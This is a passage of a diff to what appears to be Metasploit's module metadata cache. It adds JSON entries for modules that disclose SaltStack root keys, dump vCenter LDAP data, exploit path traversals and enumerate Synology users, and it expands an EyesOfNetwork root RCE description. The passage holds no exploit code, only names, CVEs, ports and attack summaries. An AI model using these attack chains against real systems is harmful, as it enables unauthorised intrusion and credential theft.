     "ref_name": "gather/enum_dns",
@@ -15981,7 +16232,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb",
     "is_install_path": true,
     "ref_name": "gather/firefox_pdfjs_file_theft",
@@ -16022,7 +16273,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb",
     "is_install_path": true,
     "ref_name": "gather/flash_rosetta_jsonp_url_disclosure",
@@ -17842,6 +18093,55 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_gather/saltstack_salt_root_key": {
+    "name": "SaltStack Salt Master Server Root Key Disclosure",
+    "fullname": "auxiliary/gather/saltstack_salt_root_key",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-30",
+    "type": "auxiliary",
+    "author": [
+      "F-Secure",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits unauthenticated access to the _prep_auth_info()\n          method in the SaltStack Salt master's ZeroMQ request server, for\n          versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n          root key used to authenticate administrative commands to the master.\n\n          VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n          known to be affected by the Salt vulnerabilities.\n\n          Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n          well as Vulhub's Docker image.",
+    "references": [
+      "CVE-2020-11651",
+      "CVE-2020-11652",
+      "URL-https://labs.f-secure.com/advisories/saltstack-authorization-bypass",
+      "URL-https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0009.html",
+      "URL-https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 4506,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-05-09 17:30:49 +0000",
+    "path": "/modules/auxiliary/gather/saltstack_salt_root_key.rb",
+    "is_install_path": true,
+    "ref_name": "gather/saltstack_salt_root_key",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_gather/samsung_browser_sop_bypass": {
     "name": "Samsung Internet Browser SOP Bypass",
     "fullname": "auxiliary/gather/samsung_browser_sop_bypass",
@@ -17871,7 +18171,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-12-16 22:10:02 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/gather/samsung_browser_sop_bypass.rb",
     "is_install_path": true,
     "ref_name": "gather/samsung_browser_sop_bypass",
@@ -18299,6 +18599,50 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_gather/vmware_vcenter_vmdir_ldap": {
+    "name": "VMware vCenter Server vmdir Information Disclosure",
+    "fullname": "auxiliary/gather/vmware_vcenter_vmdir_ldap",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-09",
+    "type": "auxiliary",
+    "author": [
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update.",
+    "references": [
+      "CVE-2020-3952",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-05-21 21:01:52 +0000",
+    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
+    "is_install_path": true,
+    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_gather/windows_deployment_services_shares": {
     "name": "Microsoft Windows Deployment Services Unattend Gatherer",
     "fullname": "auxiliary/gather/windows_deployment_services_shares",
@@ -24047,7 +24391,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-26 19:39:17 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/es_file_explorer_open_port",
@@ -24214,7 +24558,7 @@
       "Oleg Broslavsky <ovbroslavsky@gmail.com>",
       "Nikita Oleksov <neoleksov@gmail.com>"
     ],
-    "description": "This module scans for web management interfaces of the following F5 Networks devices:\n        BigIP, BigIQ, Enterprise Manager, ARX, and FirePass.",
+    "description": "This module attempts to identify the web management interfaces of the following\n        F5 Networks devices:\n        BigIP, BigIQ, Enterprise Manager, ARX, and FirePass.",
     "references": [
 
     ],
@@ -24237,7 +24581,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-24 06:42:49 +0000",
     "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/f5_mgmt_scanner",
@@ -25532,7 +25876,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/http/http_put.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_put",
@@ -25629,7 +25973,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_traversal",
@@ -26624,6 +26968,61 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/limesurvey_zip_traversals": {
+    "name": "LimeSurvey Zip Path Traversals",
+    "fullname": "auxiliary/scanner/http/limesurvey_zip_traversals",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-02",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Matthew Aberegg",
+      "Michael Burkey",
+      "Federico Fernandez",
+      "Alejandro Parodi"
+    ],
+    "description": "This module exploits an authenticated path traversal vulnerability found in LimeSurvey\n          versions between 4.0 and 4.1.11 with CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960,\n          inclusive.\n          In CVE-2020-11455 the getZipFile function within the filemanager functionality\n          allows for arbitrary file download.  The file retrieved may be deleted after viewing,\n          which was confirmed in testing.\n          In CVE-2019-9960 the szip function within the downloadZip functionality allows\n          for arbitrary file download.\n          Verified against 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328,\n          3.0.0-171222, and 2.70.0-170921.",
+    "references": [
+      "EDB-48297",
+      "CVE-2020-11455",
+      "URL-https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b",
+      "CVE-2019-9960",
+      "URL-https://www.secsignal.org/en/news/cve-2019-9960-arbitrary-file-download-in-limesurvey/",
+      "URL-https://github.com/LimeSurvey/LimeSurvey/commit/1ed10d3c423187712b8f6a8cb2bc9d5cc3b2deb8"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/limesurvey_zip_traversals",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/linknat_vos_traversal": {
     "name": "Linknat Vos Manager Traversal",
     "fullname": "auxiliary/scanner/http/linknat_vos_traversal",
@@ -30253,6 +30652,55 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/synology_forget_passwd_user_enum": {
+    "name": "Synology Forget Password  User Enumeration Scanner",
+    "fullname": "auxiliary/scanner/http/synology_forget_passwd_user_enum",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2011-01-05",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Steve Kaun"
+    ],
+    "description": "This module attempts to enumerate users on the Synology NAS\n          by sending GET requests for the forgot password URL.\n          The Synology NAS will respond differently if a user is present or not.\n          These count as login attempts, and the default is 10 logins in 5min to\n          get a permanent block.  Set delay accordingly to avoid this, as default\n          is permanent.\n          Vulnerable DSMs are:\n          DSM 6.1 < 6.1.3-15152\n          DSM 6.0 < 6.0.3-8754-4\n          DSM 5.2 < 5.2-5967-04",
+    "references": [
+      "EDB-43455",
+      "CVE-2017-9554",
+      "URL-https://www.synology.com/en-global/security/advisory/Synology_SA_17_29_DSM"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 5000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-05-21 10:08:04 +0000",
+    "path": "/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/synology_forget_passwd_user_enum",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/thinvnc_traversal": {
     "name": "ThinVNC Directory Traversal",
     "fullname": "auxiliary/scanner/http/thinvnc_traversal",
@@ -32247,6 +32695,53 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/zenload_balancer_traversal": {
+    "name": "Zen Load Balancer Directory Traversal",
+    "fullname": "auxiliary/scanner/http/zenload_balancer_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-10",
+    "type": "auxiliary",
+    "author": [
+      "Basim Alabdullah",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits a authenticated directory traversal vulnerability in Zen Load\n          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='\n          parameter which allows a malicious actor to load arbitrary file path.",
+    "references": [
+      "EDB-48308"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 444,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-04-16 10:52:10 +0000",
+    "path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/zenload_balancer_traversal",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/zenworks_assetmanagement_fileaccess": {
     "name": "Novell ZENworks Asset Management 7.5 Remote File Access",
     "fullname": "auxiliary/scanner/http/zenworks_assetmanagement_fileaccess",
@@ -33010,7 +33505,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/cisco_smart_install",
@@ -33050,7 +33545,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
     "is_install_path": true,
     "ref_name": "scanner/misc/clamav_control",
@@ -39752,7 +40247,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-31 14:15:32 +0000",
+    "mod_time": "2020-05-14 18:00:30 +0000",
     "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
     "is_install_path": true,
     "ref_name": "scanner/smb/impacket/wmiexec",
@@ -41632,7 +42127,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-07-09 20:35:49 +0000",
+    "mod_time": "2020-04-23 17:31:50 +0000",
     "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login",
@@ -41670,7 +42165,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-07-09 20:35:49 +0000",
+    "mod_time": "2020-04-23 17:31:50 +0000",
     "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -41863,7 +42358,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
     "is_install_path": true,
     "ref_name": "scanner/ssl/openssl_heartbleed",
@@ -43978,7 +44473,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/drda.rb",
     "is_install_path": true,
     "ref_name": "server/capture/drda",
@@ -44016,7 +44511,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-04 21:46:01 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/ftp.rb",
     "is_install_path": true,
     "ref_name": "server/capture/ftp",
@@ -44054,7 +44549,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:34:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/http.rb",
     "is_install_path": true,
     "ref_name": "server/capture/http",
@@ -44091,7 +44586,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-08 21:23:27 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/http_basic.rb",
     "is_install_path": true,
     "ref_name": "server/capture/http_basic",
@@ -44166,7 +44661,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/http_ntlm.rb",
     "is_install_path": true,
     "ref_name": "server/capture/http_ntlm",
@@ -44204,7 +44699,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-08 21:23:27 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/imap.rb",
     "is_install_path": true,
     "ref_name": "server/capture/imap",
@@ -44241,7 +44736,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:34:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/mssql.rb",
     "is_install_path": true,
     "ref_name": "server/capture/mssql",
@@ -44278,7 +44773,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-09 18:32:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/mysql.rb",
     "is_install_path": true,
     "ref_name": "server/capture/mysql",
@@ -44316,7 +44811,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:34:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/pop3.rb",
     "is_install_path": true,
     "ref_name": "server/capture/pop3",
@@ -44353,7 +44848,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:34:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/postgresql.rb",
     "is_install_path": true,
     "ref_name": "server/capture/postgresql",
@@ -44392,7 +44887,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/printjob_capture.rb",
     "is_install_path": true,
     "ref_name": "server/capture/printjob_capture",
@@ -44429,7 +44924,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/sip.rb",
     "is_install_path": true,
     "ref_name": "server/capture/sip",
@@ -44466,7 +44961,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/smb.rb",
     "is_install_path": true,
     "ref_name": "server/capture/smb",
@@ -44504,7 +44999,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:34:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/smtp.rb",
     "is_install_path": true,
     "ref_name": "server/capture/smtp",
@@ -44541,7 +45036,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-04-20 16:02:33 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/telnet.rb",
     "is_install_path": true,
     "ref_name": "server/capture/telnet",
@@ -44578,7 +45073,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-11-15 17:01:52 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/capture/vnc.rb",
     "is_install_path": true,
     "ref_name": "server/capture/vnc",
@@ -44624,7 +45119,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/dhclient_bash_env.rb",
     "is_install_path": true,
     "ref_name": "server/dhclient_bash_env",
@@ -44665,7 +45160,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/dhcp.rb",
     "is_install_path": true,
     "ref_name": "server/dhcp",
@@ -44740,7 +45235,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/dns/spoofhelper.rb",
     "is_install_path": true,
     "ref_name": "server/dns/spoofhelper",
@@ -44779,7 +45274,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/fakedns.rb",
     "is_install_path": true,
     "ref_name": "server/fakedns",
@@ -44816,7 +45311,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/ftp.rb",
     "is_install_path": true,
     "ref_name": "server/ftp",
@@ -44862,7 +45357,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-18 11:33:48 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/http_ntlmrelay.rb",
     "is_install_path": true,
     "ref_name": "server/http_ntlmrelay",
@@ -44943,7 +45438,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb",
     "is_install_path": true,
     "ref_name": "server/jsse_skiptls_mitm_proxy",
@@ -44980,7 +45475,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-09-14 09:28:38 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/local_hwbridge.rb",
     "is_install_path": true,
     "ref_name": "server/local_hwbridge",
@@ -45064,7 +45559,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/netbios_spoof_nat.rb",
     "is_install_path": true,
     "ref_name": "server/netbios_spoof_nat",
@@ -45105,7 +45600,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb",
     "is_install_path": true,
     "ref_name": "server/openssl_altchainsforgery_mitm_proxy",
@@ -45149,7 +45644,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-08-27 13:11:22 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/openssl_heartbeat_client_memory.rb",
     "is_install_path": true,
     "ref_name": "server/openssl_heartbeat_client_memory",
@@ -45189,7 +45684,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/pxeexploit.rb",
     "is_install_path": true,
     "ref_name": "server/pxeexploit",
@@ -45265,7 +45760,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/socks4a.rb",
     "is_install_path": true,
     "ref_name": "server/socks4a",
@@ -45304,7 +45799,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-05-26 13:46:00 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/socks5.rb",
     "is_install_path": true,
     "ref_name": "server/socks5",
@@ -45341,7 +45836,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/socks_unc.rb",
     "is_install_path": true,
     "ref_name": "server/socks_unc",
@@ -45379,7 +45874,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/tftp.rb",
     "is_install_path": true,
     "ref_name": "server/tftp",
@@ -45416,7 +45911,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/webkit_xslt_dropper.rb",
     "is_install_path": true,
     "ref_name": "server/webkit_xslt_dropper",
@@ -45455,7 +45950,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2020-02-18 08:58:30 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
     "is_install_path": true,
     "ref_name": "server/wget_symlink_file_write",
@@ -45529,7 +46024,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/sniffer/psnuffle.rb",
     "is_install_path": true,
     "ref_name": "sniffer/psnuffle",
@@ -45642,7 +46137,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/spoof/cisco/dtp.rb",
     "is_install_path": true,
     "ref_name": "spoof/cisco/dtp",
@@ -45836,7 +46331,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/spoof/llmnr/llmnr_response.rb",
     "is_install_path": true,
     "ref_name": "spoof/llmnr/llmnr_response",
@@ -45875,7 +46370,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/spoof/mdns/mdns_response.rb",
     "is_install_path": true,
     "ref_name": "spoof/mdns/mdns_response",
@@ -45912,7 +46407,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-12 22:15:21 +0000",
     "path": "/modules/auxiliary/spoof/nbns/nbns_response.rb",
     "is_install_path": true,
     "ref_name": "spoof/nbns/nbns_response",
@@ -48529,7 +49024,7 @@
       "pusscat <pusscat@metasploit.com>",
       "skylined <skylined@edup.tudelft.nl>"
     ],
-    "description": "Encodes payloads as unicode-safe mixedcase text.  This encoder uses\n        SkyLined's Alpha2 encoding suite.",
+    "description": "Encodes payload as unicode-safe mixedcase text.  This encoder uses\n        SkyLined's Alpha2 encoding suite.",
     "references": [
 
     ],
@@ -48539,7 +49034,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-02 21:51:05 +0000",
     "path": "/modules/encoders/x86/unicode_mixed.rb",
     "is_install_path": true,
     "ref_name": "x86/unicode_mixed",
@@ -48573,7 +49068,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-02 21:51:05 +0000",
     "path": "/modules/encoders/x86/unicode_upper.rb",
     "is_install_path": true,
     "ref_name": "x86/unicode_upper",
@@ -51346,7 +51841,7 @@
       "Unix In-Memory",
       "Linux Dropper"
     ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
     "path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/axis_srv_parhand_rce",
@@ -51944,7 +52439,7 @@
       "Python",
       "Unix Command"
     ],
-    "mod_time": "2020-01-14 10:46:04 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
     "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/citrix_dir_traversal_rce",
@@ -53604,7 +54099,7 @@
     "needs_cleanup": null
   },
   "exploit_linux/http/eyesofnetwork_autodiscovery_rce": {
-    "name": "EyesOfNetwork AutoDiscovery Target Command Execution",
+    "name": "EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution",
     "fullname": "exploit/linux/http/eyesofnetwork_autodiscovery_rce",
     "aliases": [
 
@@ -53617,16 +54112,18 @@
       "bcoles <bcoles@gmail.com>",
       "Erik Wynter"
     ],
-    "description": "This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3\n        and prior in order to execute arbitrary commands as root.\n\n        This module takes advantage of a command injection vulnerability in the\n        `target` parameter of the AutoDiscovery functionality within the EON web\n        interface in order to write an Nmap NSE script containing the payload to\n        disk. It then starts an Nmap scan to activate the payload. This results in\n        privilege escalation because the`apache` user can execute Nmap as root.\n\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via two methods, i.e. by\n        generating an API access token based on a hardcoded key, and via SQLI.\n        This module has been successfully tested on EyesOfNetwork 5.3 with API\n        version 2.4.2.",
+    "description": "This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2\n        and 5.3 in order to execute arbitrary commands as root.\n\n        This module takes advantage of a command injection vulnerability in the\n        `target` parameter of the AutoDiscovery functionality within the EON web\n        interface in order to write an Nmap NSE script containing the payload to\n        disk. It then starts an Nmap scan to activate the payload. This results in\n        privilege escalation because the`apache` user can execute Nmap as root.\n\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via various methods, depending on\n        the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL\n        injection exploits. EON 5.1 and 5.2 can only be exploited via SQL injection.\n        This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.",
     "references": [
       "CVE-2020-8654",
       "CVE-2020-8655",
       "CVE-2020-8656",
       "CVE-2020-8657",
-      "EDB-48025"
+      "CVE-2020-9465",
+      "EDB-48025",
+      "url-https://github.com/h4knet/eonrce"
     ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
+    "platform": "",
+    "arch": "",
     "rport": 443,
     "autofilter_ports": [
       80,
@@ -53644,9 +54141,11 @@
       "https"
     ],
     "targets": [
-      "Auto"
+      "Linux (x86)",
+      "Linux (x64)",
+      "Linux (cmd)"
     ],
-    "mod_time": "2020-03-02 15:10:46 +0000",
+    "mod_time": "2020-05-21 16:31:45 +0000",
     "path": "/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/eyesofnetwork_autodiscovery_rce",
@@ -53654,6 +54153,16 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
     },
     "needs_cleanup": null
   },
@@ -54396,6 +54905,58 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/ibm_drm_rce": {
+    "name": "IBM Data Risk Manager Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/ibm_drm_rce",
